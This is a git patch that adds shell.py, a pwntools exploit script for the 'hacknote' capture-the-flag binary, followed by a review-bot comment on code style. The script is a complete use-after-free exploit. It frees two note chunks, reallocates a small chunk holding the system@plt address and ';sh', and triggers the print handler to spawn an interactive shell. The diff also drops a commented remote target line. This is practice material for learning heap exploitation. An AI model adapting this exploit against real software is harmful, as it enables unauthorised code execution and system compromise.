From 1d1b1ffec2e356469a0be905d9765ccd6da09e67 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Thu, 27 Jan 2022 15:53:37 +0800
Subject: [PATCH] Updated UAF/hacknote

---
 UAF/hacknote/answer.py | 1 -
 UAF/hacknote/shell.py | 50 ++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 50 insertions(+), 1 deletion(-)
 create mode 100644 UAF/hacknote/shell.py

diff --git a/UAF/hacknote/answer.py b/UAF/hacknote/answer.py
index 4fc248a..82cfe7d 100644
--- a/UAF/hacknote/answer.py
+++ b/UAF/hacknote/answer.py
@@ -25,7 +25,6 @@ def note_print(p, index):
 p.recvuntil('Index :')
 p.sendline(str(index))
-# p = remote("hackme.inndy.tw", 7719)
 p = process('./hacknote')
 elf = ELF('./hacknote')
 gdb_command = """
diff --git a/UAF/hacknote/shell.py b/UAF/hacknote/shell.py
new file mode 100644
index 0000000..36d5f81
--- /dev/null
+++ b/UAF/hacknote/shell.py
@@ -0,0 +1,50 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "i386", os = "linux", log_level = "debug")
+
+def note_add(p, size, content):
+ p.recvuntil('Your choice :')
+ p.sendline('1')
+ p.recvuntil('Note size :')
+ p.sendline(str(size))
+ p.recvuntil('Content :')
+ p.send(content)
+
+def note_delete(p, index):
+ p.recvuntil('Your choice :')
+ p.sendline('2')
+ p.recvuntil('Index :')
+ p.sendline(str(index))
+
+def note_print(p, index):
+ p.recvuntil('Your choice :')
+ p.sendline('3')
+ p.recvuntil('Index :')
+ p.sendline(str(index))
+
+p = process('./hacknote')
+elf = ELF('./hacknote')
+gdb_command = """
+ #b *0x80486ca
+ #b *0x8048893
+ #b *0x80488a9
+ #b *0x804875c
+ #b *0x804896C
+ """
+
+system_addr = elf.plt['system'] + 0x6
+# gdb.attach(p, gdb_command)
+
+
+note_add(p, 100, "/bin/sh\x00")
+note_add(p, 100, "/bin/sh\x00")
+note_delete(p, 0)
+note_delete(p, 1)
+note_add(p, 8, p32(system_addr) + ";sh\x00")
+note_print(p, 0)
+
+
+p.interactive()
\ No newline at end of file
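Review bot: The new shell.py carries several imports that nothing in the file uses — `from LibcSearcher import *`, `from struct import pack` and `import os, base64, math, time` — and two star imports make it impossible to tell which names come from where; the file also ends without a trailing newline. The three menu helpers (`note_add`, `note_delete`, `note_print`) appear to be copied verbatim from answer.py, whose `note_print` is visible in the first hunk, so a shared module or a one-line header comment noting the duplication would keep the two scripts from drifting. The file has no docstring; a short one such as `"""Local pwntools harness for the hacknote lab binary; drives the menu via process('./hacknote')."""` would tell a reader what the script expects to find in the working directory. The commented-out breakpoint list in `gdb_command` and the commented `gdb.attach` call are dead code and could be dropped or noted as debug-only.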